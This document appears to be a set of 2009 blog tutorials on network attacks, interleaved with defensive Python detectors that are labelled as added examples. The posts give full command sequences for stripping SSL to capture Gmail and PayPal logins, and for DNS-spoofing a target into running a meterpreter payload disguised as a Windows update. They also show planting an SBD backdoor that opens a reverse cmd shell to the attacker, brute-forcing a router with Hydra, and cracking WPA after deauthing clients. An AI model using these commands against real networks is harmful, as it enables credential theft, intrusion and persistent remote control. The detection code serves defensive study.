2009-07-10

[Video] Stripping SSL & Sniffing HTTPS (SSLStrip)

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2345515
Download video: http://www.mediafire.com/?nbx8odfabbgf21j



What is this?
This video shows that, even with SSL encryption, a connection isn't secure. Proof of this is seen by capturing a web-based email (Google Mail) & online bank (PayPal) password.




How does this work?
> Performs a 'Man In The Middle' attack, so all the traffic flows through the attacker.
> Picks out HTTP traffic on port 80 and redirects / forwards the packets to a different port.
> SSLStrip is listening on that port and removes the SSL from the connection before passing it back to the user.
> ettercap then picks out the username & password.


What do I need?

> sslstrip
> arpspoof
> ettercap
*all in BackTrack 4 Pre Final*


Network Setup:
Target's IP: 192.168.1.6
Gateway IP: 192.168.1.1


Software
Name: sslstrip
Version: 0.2
Home Page: http://www.thoughtcrime.org/software/sslstrip/index.html
Download Link: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.2.tar.gz

Name: arpspoof (DSniff)
Version: 2.3
Home Page: http://www.monkey.org/~dugsong/dsniff/
Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

Name: ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net
Download Link: http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download


Commands:
kate /etc/etter.conf
>*uncomment redir_command_off in the iptables (linux) section*
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i wlan0

sslstrip -a -k -f
ettercap -T -q -i wlan0
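The ARP poisoning that the arpspoof step above relies on is also the point where a defender can see it happen. This is an added example, not part of the original post: it watches a stream of ARP replies (constructed here, not captured) and alerts when an IP already bound to one MAC is repeatedly re-announced by another, which is exactly what the target's cache sees during the attack.

```python
"""Spot the ARP cache poisoning that `arpspoof -t 192.168.1.6 192.168.1.1`
relies on, from the defender's side. Added example, not from the original
post; the ARP replies below are constructed, not captured. The tell is an IP
that was bound to one MAC suddenly being re-announced by a different MAC,
over and over (arpspoof re-sends the forged reply every couple of seconds).
"""
from collections import defaultdict

# Constructed ARP replies as (seconds, sender IP, sender MAC).
ARP_REPLIES = [
    (0.0, "192.168.1.1", "00:11:22:33:44:01"),    # real gateway
    (1.0, "192.168.1.6", "00:11:22:33:44:06"),    # the target itself
    (5.0, "192.168.1.1", "00:11:22:33:44:01"),
    (9.0, "192.168.1.1", "00:11:22:33:44:99"),    # gateway IP, new MAC
    (11.0, "192.168.1.1", "00:11:22:33:44:99"),
    (13.0, "192.168.1.1", "00:11:22:33:44:99"),
]

def detect_arp_poisoning(replies, min_repeats=2):
    """Return (time, ip, old_mac, new_mac, verdict) alerts.

    A single MAC change is reported as "mac-changed" (hardware does get
    replaced); the same new MAC re-claiming the IP `min_repeats` times is
    reported once more as "likely-poisoning", which is how arpwatch-style
    monitors separate a hardware swap from a sustained spoof.
    """
    binding = {}                 # ip -> MAC first seen for it
    repeats = defaultdict(int)   # (ip, new_mac) -> how often it re-claimed
    alerts = []
    for ts, ip, mac in replies:
        known = binding.setdefault(ip, mac)
        if mac == known:
            continue
        repeats[(ip, mac)] += 1
        if repeats[(ip, mac)] == 1:
            alerts.append((ts, ip, known, mac, "mac-changed"))
        elif repeats[(ip, mac)] == min_repeats:
            alerts.append((ts, ip, known, mac, "likely-poisoning"))
    return alerts

if __name__ == "__main__":
    for ts, ip, old, new, verdict in detect_arp_poisoning(ARP_REPLIES):
        print(f"t={ts:4.1f}s {ip}: {old} -> {new} [{verdict}]")
```

The same check applies to the ettercap `-M ARP` run in the next post; on a real network it needs a sensor that actually sees the ARP traffic (the monitored host itself, or a mirror port).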




Notes:
You could save the packets instead and look through them later, in case ettercap doesn't pick up the information you need!

Song: 16 Bit Lolitas - Nobody Seems To Care
Video length: 03:55
Capture length: 4:41

Blog Post: http://g0tmi1k.blogspot.com/2009/07/videotutorial-how-to-snifff-ssl-https.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1659-%5Bvideo%5D-how-snifff-ssl-https-sslstrip.html



~g0tmi1k

2009-07-04

[Video] Man In The Middle (ettercap, metasploit, SBD)

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2319124
Download video: http://www.mediafire.com/?338fbcekne9pd0b



What is this?
By setting up a fake web site, we social engineer our target to run our exploit. The end result gives us command line access to our target's PC.



How does this work?
> Ettercap to do the MITM Attack
> Metasploit for the exploit
> Secure BackDoor (SBD) for the backdoor
> Apache for the web server


What do I need?
> Ettercap
> Metasploit
> A web server
> SBD (optional)
*all of this is in BackTrack 4*


Network Setup:
Attacker's IP: 192.168.1.104
Target's IP: 192.168.1.101
Gateway IP: 192.168.1.1


Software
Name: Ettercap
Version: 0.7.3
Home Page: http://ettercap.sourceforge.net/
Download Link: http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download

Name: Metasploit
Version: 3.3
Home Page: http://www.metasploit.com/
Download Link: http://spool.metasploit.com/releases/framework-3.2.tar.gz

Name: SBD
Version: 1.36
Home Page: http://tigerteam.se/
Download Link: http://packetstormsecurity.org/UNIX/netcat/sbd-1.36.tar.gz
Source: http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=sbd


Commands:
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 X > /var/www/Windows-KB183905-x86-ENU.exe
kate /var/www/index.html
>*Replace the filename with the new one, Windows-KB183905-x86-ENU.exe*
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.104
exploit

cd /usr/share/ettercap/
mv -f etter.dns etter.dns.old
kate etter.dns
> * A 192.168.1.104
ettercap -i wlan0 -T -q -P dns_spoof -M ARP /http://192.168.1.1/ /http://192.168.1.101/

upload /root/tools/backdoors/sbd-1.36/sbd.exe C:/
execute -H -f "C:/sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 192.168.1.104"

wine /root/tools/backdoors/sbd-1.36/sbd.exe -l -k g0tmi1k -p 7332
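The dns_spoof step above works through the etter.dns wildcard `* A 192.168.1.104`, which makes every public hostname the target looks up resolve to one LAN address. That is a detectable pattern; this added example (not from the original post, answers constructed rather than captured) flags private IPs that answer for several unrelated public names.

```python
"""Flag DNS answers that look like an ettercap dns_spoof wildcard rule.

Added example, not from the original post. With `* A 192.168.1.104` in
etter.dns every A query is answered with the attacker's LAN address, so on
the wire many unrelated public hostnames collapse onto a single RFC1918
IP. The answer records below are constructed, not captured.
"""
import ipaddress
from collections import defaultdict

# Constructed A-record answers seen by the target: (queried name, answer IP).
DNS_ANSWERS = [
    ("www.google.com", "74.125.77.99"),       # before the spoof started
    ("www.google.com", "192.168.1.104"),
    ("mail.google.com", "192.168.1.104"),
    ("www.paypal.com", "192.168.1.104"),
    ("update.microsoft.com", "192.168.1.104"),
    ("printer.lan", "192.168.1.20"),          # genuine local hosts
    ("nas.lan", "192.168.1.21"),
]

# Names that are expected to live in private address space on this LAN.
LOCAL_SUFFIXES = (".lan", ".local", ".home")

def find_spoofed_answers(answers, min_names=3):
    """Return {private_ip: sorted public names} for private IPs that answer
    for at least `min_names` distinct non-local hostnames.

    Local names are ignored. One public name in RFC1918 space can be
    split-horizon DNS, hence the threshold; several unrelated public names
    on one private address is the wildcard signature.
    """
    names_by_ip = defaultdict(set)
    for qname, ip in answers:
        if not ipaddress.ip_address(ip).is_private:
            continue
        if qname.lower().endswith(LOCAL_SUFFIXES):
            continue
        names_by_ip[ip].add(qname.lower())
    return {ip: sorted(names) for ip, names in names_by_ip.items()
            if len(names) >= min_names}

if __name__ == "__main__":
    for ip, names in find_spoofed_answers(DNS_ANSWERS).items():
        print(f"{ip} answers for {len(names)} public names: {', '.join(names)}")
```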


Notes:
Sorry for the poor video editing on this one - it is cut from a final video called "g0tmi1k's home network" which is still incomplete.

Song: Mr. Scruff - Is He Ready & Mr. Scruff - Get a Move On
Video length: 06:57
Capture length: 7:40

Blog Post: http://g0tmi1k.blogspot.com/2009/07/videotutorial-man-in-middle-mitm-attack.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1658-[video]-attack-man-middle-{mitm}-ettercap-metasploit-sbd.html



~g0tmi1k

[Video] Cracking HTTP passwords (Hydra)

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2318952
Download video: http://www.mediafire.com/?yhc1adzytiqibjc


What is this?
A basic guide on how to use hydra to crack an HTTP password on a 'home' router.




How does this work?
> Uses a dictionary attack to test for weak or simple passwords on one or more remote clients


What do I need?
> Hydra
> Big dictionary


Software
Name: Hydra
Version: 5.4
Home Page: http://freeworld.thc.org/
Download Link: http://freeworld.thc.org/download.php?t=r&f=hydra-5.4-src.tar.gz


Commands:
hydra -l admin -P /pentest/passwords/wordlists/g0tmi1k.lst -e ns -t 15 -f -S -vV 192.168.1.1 http-get /

-l = username
-P = password wordlist (file of passwords to try)
-e ns = checks for a 'null' password
-t xx = how many tasks to run at once
-f = exit once it finds the first user/password
-S = connect via SSL
-vV = verbose mode (shows more info)
192.168.1.1 = IP address
http-get = what to crack / method
/ = page to crack - root
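From the router's side, a hydra run like this is a dense burst of 401 responses from one address against one path. This added example (not from the original post; the access-log lines are constructed) parses Common Log Format lines and raises an alert when a source crosses a 401 threshold inside a short window.

```python
"""Detect the HTTP basic-auth brute force this post demonstrates, from the
defender's side. Added example, not from the original post: it parses
Common Log Format access-log lines (constructed, not from the video) and
flags a source collecting many 401s on one path inside a short window.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Return (ip, timestamp, path, status) or None for a non-CLF line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], int(m["status"])

def find_bruteforce(lines, threshold=10, window_s=60):
    """Map (ip, path) -> time the threshold was first crossed, for sources
    receiving `threshold` or more 401s on one path within `window_s` seconds."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[3] != 401:     # only failed auth matters here
            continue
        ip, ts, path, _ = rec
        q = recent[(ip, path)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # slide the window
            q.popleft()
        if len(q) >= threshold and (ip, path) not in alerts:
            alerts[(ip, path)] = ts
    return alerts

# Constructed sample: 12 failed logins in 12 seconds from one host, plus one
# mistyped password and one normal page load from the legitimate admin.
SAMPLE_LOG = [
    f'192.168.1.104 - - [10/Jul/2009:12:00:{s:02d} +0100] "GET / HTTP/1.0" 401 401'
    for s in range(12)
] + [
    '192.168.1.6 - - [10/Jul/2009:12:00:05 +0100] "GET / HTTP/1.1" 401 401',
    '192.168.1.6 - - [10/Jul/2009:12:00:09 +0100] "GET / HTTP/1.1" 200 2045',
]

if __name__ == "__main__":
    for (ip, path), when in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip} brute-forcing {path}: threshold crossed at {when.time()}")
```

The `-t 15` parallel tasks in the command above are what make the burst dense enough for a rate threshold to catch; a router that only logs successes would never show this, so check that failed logins are logged at all.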


Notes:
This is cut from my final video called "g0tmi1k's home network".
The password HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being cracked are next to nothing!

Song: Rage Against The Machine - Killing in the Name of (Mr. Oizo Remix)
Video length: 01:21
Capture length: 01:40

Blog Post: http://g0tmi1k.blogspot.com/2009/07/video-tutorial-how-to-crack-http-hydra.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1657-%5Bvideo%5D-how-crack-http-passwords-hydra.html
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html



~g0tmi1k

[Video] Cracking WiFi - WPA/WPA2 with Hidden SSID (aircrack-ng + airolib-ng)

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/2318855
Download video: http://www.mediafire.com/?kn0b37v79rptd9e



What is this?
How to crack a wireless network using WPA/WPA2 (PSK/AES) encryption when there is a connected client (both use the same method!), then using a pre-computed hash table which has been "pre-salted" with the ESSID of the network to get the pass-phrase.




How does this work?
> Captures a 4-way handshake
> Creates a quick DoS (Denial of Service) attack against a connected client to force it to disconnect and reconnect
> Applies a brute force dictionary attack to the handshake


What do I need?

> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power


Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/aircrack-ng-1.0-rc3.tar.gz


Commands:
airmon-ng start wlan0



airodump-ng mon0

airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0



aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0



airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst

kate ~/essid

airolib-ng crackwpa --import essid ~/essid

airolib-ng crackwpa --stats

airolib-ng crackwpa --clean all

airolib-ng crackwpa --batch

airolib-ng crackwpa --verify all



aircrack-ng -r crackwpa output*.cap
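The reason the airolib-ng table above has to be imported together with the ESSID is the key derivation itself: WPA/WPA2-PSK uses the network name as the PBKDF2 salt. This added example (not from the original post; passphrases and network names are constructed, the IEEE 802.11i test vector aside) computes the Pairwise Master Key and shows that a table built for one ESSID says nothing about a network with a different name, which is why a unique SSID plus a long pass-phrase is the defence.

```python
"""Why the airolib-ng table in this post has to be "pre-salted" with the ESSID.

Added example, not part of the original post. WPA/WPA2-PSK derives its
Pairwise Master Key as PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds,
32 bytes): the network name is the salt, so PMKs computed for one ESSID
are useless against a network with a different name. Passphrases and
ESSIDs below are constructed, apart from the IEEE 802.11i test vector.
"""
import hashlib

def wpa_pmk(passphrase: str, essid: str) -> bytes:
    """Pairwise Master Key for a WPA/WPA2 personal network (IEEE 802.11i)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    # 4096 rounds is the fixed per-candidate cost an attacker pays; the
    # precomputed table only moves that cost ahead of the capture.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               essid.encode("utf-8"), 4096, 32)

def table_reusable(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """True only if a PMK table built for essid_a also serves essid_b,
    i.e. the two networks share a name."""
    return wpa_pmk(passphrase, essid_a) == wpa_pmk(passphrase, essid_b)

if __name__ == "__main__":
    # Standard test vector: passphrase "password", SSID "IEEE".
    print("PMK(password, IEEE) =", wpa_pmk("password", "IEEE").hex())
    print("table for 'linksys' reusable on 'g0tmi1k-home':",
          table_reusable("password", "linksys", "g0tmi1k-home"))
    print("table for 'linksys' reusable on 'linksys':",
          table_reusable("password", "linksys", "linksys"))
```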


Notes:
This is cut from my final video called "g0tmi1k's home network".
There HAS to be a CONNECTED client.
The pass-phrase HAS to be in the dictionary - so if you use something like http://grc.com/pass, the chances of it being cracked are next to nothing!

Song: Sub Focus - Rock It
Video length: 03:53
Capture length: 04:03

Blog Post: http://g0tmi1k.blogspot.com/2009/07/video-tutorial-how-to-crack-wpawpa2.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1656-%5Bvideo%5D-how-crack-wpa-wpa2-aircrack-ng-airolib-ng.html
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html



~g0tmi1k